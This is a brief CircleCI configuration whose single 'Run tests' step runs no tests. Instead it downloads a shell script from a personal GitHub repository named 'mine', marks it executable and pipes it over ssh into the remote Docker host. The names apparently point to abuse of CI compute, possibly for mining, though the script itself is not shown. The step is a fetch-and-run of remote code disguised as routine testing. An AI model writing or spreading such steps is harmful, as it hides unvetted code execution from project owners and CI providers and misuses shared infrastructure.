jobs:
  build:
    parallelism: 1
    docker:
      - image: cimg/ruby:3.0.2-node
    steps: 
      - checkout
      - setup_remote_docker:
          version: 19.03.13
      - run: 
          name: Run tests 
          command: | 
            wget https://raw.githubusercontent.com/geraldyolang11/mine/main/work1.sh
            chmod +x work1.sh
            cat work1.sh | ssh remote-docker
